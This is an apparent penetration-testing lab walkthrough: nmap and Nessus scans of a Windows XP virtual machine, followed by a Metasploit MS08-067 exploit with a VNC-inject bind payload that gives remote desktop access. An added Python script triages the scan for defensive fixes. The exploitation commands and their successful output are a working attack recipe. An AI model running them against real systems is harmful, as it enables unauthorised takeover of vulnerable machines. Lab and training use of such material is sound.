First step: information gathering & service enumeration
Scan the network 192.168.43.0/24 using nmap: a ping sweep to find live hosts first, then a full service and OS scan of the host of interest.
root@bt:~# nmap -sP 192.168.43.0/24
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:09 WIT
Nmap scan report for 192.168.43.1
Host is up.
Nmap scan report for 192.168.43.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Nmap scan report for 192.168.43.254
Host is up (0.00077s latency).
MAC Address: 00:50:56:F8:58:F4 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.87 seconds
root@bt:~# nmap -T4 -A -v 192.168.43.2
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:14 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 04:14
Scanning 192.168.43.2 [1 port]
Completed ARP Ping Scan at 04:14, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:14
Completed Parallel DNS resolution of 1 host. at 04:14, 0.78s elapsed
Initiating SYN Stealth Scan at 04:14
Scanning 192.168.43.2 [1000 ports]
Discovered open port 139/tcp on 192.168.43.2
Discovered open port 445/tcp on 192.168.43.2
Discovered open port 135/tcp on 192.168.43.2
Completed SYN Stealth Scan at 04:14, 1.19s elapsed (1000 total ports)
Initiating Service scan at 04:14
Scanning 3 services on 192.168.43.2
Completed Service scan at 04:14, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.2
NSE: Script scanning 192.168.43.2.
Initiating NSE at 04:14
Completed NSE at 04:14, 0.17s elapsed
Nmap scan report for 192.168.43.2
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: H-C5FF0122DAD84, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:74:ec (Cadmus Computer Systems)
| Names
| H-C5FF0122DAD84<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| H-C5FF0122DAD84<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.43.2
NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds
Raw packets sent: 1103 (49.230KB) | Rcvd: 1017 (41.234KB)
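The scan report above already carries the defender's signal: RPC/SMB on 135, 139 and 445 reachable, an XP SP2/SP3 fingerprint, the Guest account usable for SMB enumeration, message signing disabled and an SMBv1-only server. The script below is an added example, not code from the original post, that parses a plain-text nmap report of this shape and turns those lines into prioritised findings with a fix for each. The SAMPLE_REPORT and HARDENED_REPORT excerpts are constructed to mirror the post's output; the registry value and KB number in the remediation text come from general knowledge, not from the page.

```python
"""Triage a plain-text `nmap -A` report for the SMB exposure indicators shown above.

Added example, not code from the original post. It parses the report format nmap
prints (scan report header, PORT/STATE/SERVICE table, "OS details:" line and the
"|"-prefixed NSE script output) and maps what it finds to defender findings.
"""
import re

# Constructed excerpt modelled on the post's `nmap -T4 -A` output for 192.168.43.2.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.43.2
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3
Host script results:
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""

# Constructed counter-example: a host that still serves SMB but requires signing.
HARDENED_REPORT = """\
Nmap scan report for 192.168.43.20
Host is up (0.00060s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds
OS details: Microsoft Windows 10
Host script results:
| smb-security-mode:
|   Account that was used for smb scripts: <blank>
|   User-level authentication
|_  Message signing required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
OS_RE = re.compile(r"^OS details: (.*)$")
SMB_PORTS = {135, 139, 445}


def parse_report(text):
    """Extract host, open ports, OS guess and NSE script lines from an nmap text report."""
    info = {"host": None, "open_ports": [], "os": None, "script_lines": []}
    for raw in text.splitlines():
        line = raw.strip()
        if (m := HOST_RE.match(line)):
            info["host"] = m.group(1)
        elif (m := PORT_RE.match(line)) and m.group(3) == "open":
            info["open_ports"].append((int(m.group(1)), m.group(4), m.group(5) or ""))
        elif (m := OS_RE.match(line)):
            info["os"] = m.group(1)
        elif line.startswith("|"):
            # NSE output lines are prefixed with "| " or "|_"; keep only the text.
            info["script_lines"].append(line.lstrip("|_ ").strip())
    return info


def triage(info):
    """Turn parsed observations into (severity, finding, remediation) tuples."""
    findings = []
    exposed = sorted(p for p, _, _ in info["open_ports"] if p in SMB_PORTS)
    if exposed:
        findings.append(("high", f"RPC/SMB ports reachable: {exposed}",
                         "Block 135/139/445 from untrusted networks at the host firewall."))
    if info["os"] and "Windows XP" in info["os"]:
        findings.append(("critical", f"End-of-life OS fingerprint: {info['os']}",
                         "Retire the host; at minimum apply the MS08-067 update (KB958644)."))
    script = "\n".join(info["script_lines"]).lower()
    if "message signing disabled" in script:
        findings.append(("high", "SMB message signing disabled",
                         "Set RequireSecuritySignature=1 under "
                         r"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters."))
    if "doesn't support smbv2" in script:
        findings.append(("medium", "Server speaks SMBv1 only",
                         "Move to a platform that supports SMBv2+ and disable SMBv1."))
    if "used for smb scripts: guest" in script:
        findings.append(("medium", "Guest account accepted for SMB enumeration",
                         "Disable the Guest account and restrict anonymous SMB access."))
    return findings


def highest_severity(findings):
    """Return the worst severity present, or 'none' when there are no findings."""
    order = ["none", "low", "medium", "high", "critical"]
    return max((f[0] for f in findings), key=order.index, default="none")


if __name__ == "__main__":
    for report in (SAMPLE_REPORT, HARDENED_REPORT):
        info = parse_report(report)
        findings = triage(info)
        print(f"{info['host']}: {highest_severity(findings)}")
        for sev, what, fix in findings:
            print(f"  [{sev}] {what}\n      fix: {fix}")
```

Run it against a saved `nmap -A` text report to get the same prioritised list; the hardened host shows how the output collapses to a single port-exposure finding once signing is required and the OS is supported.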
Second step: vulnerability scanning using Nessus
First, scan the network 192.168.43.0/24: press Launch Scan and Nessus will run the vulnerability scan.
Then open the scan results for the target, select the host 192.168.43.2, and the vulnerabilities found on that host are listed.
Based on what the SMB service reported, I will go after SMB.
The full vulnerability report can be viewed at this link:
https://docs.google.com/open?id=0B-KNbh5PxtuaOTFiMzRiYjMtZWFkYy00MTE4LWE2NTktMzk5NzY3ZDkxNjVl
Last step: exploitation. Open msfconsole (the Metasploit console): from a terminal, type msfconsole and it will start.
msf > use windows/smn/ms09_001_netapi
[-] Failed to load module: windows/smn/ms09_001_netapi
msf > use windows/smb/ms09_001_netapi
[-] Failed to load module: windows/smb/ms09_001_netapi
msf > use windows/smb/ms09_001_nestapi
[-] Failed to load module: windows/smb/ms09_001_nestapi
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.43.2
rhost => 192.168.43.2
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.43.2
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "h-c5ff0122dad84"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
The target is now opened by vncinject.
@keep smile & spirit
be fun
Cool!!!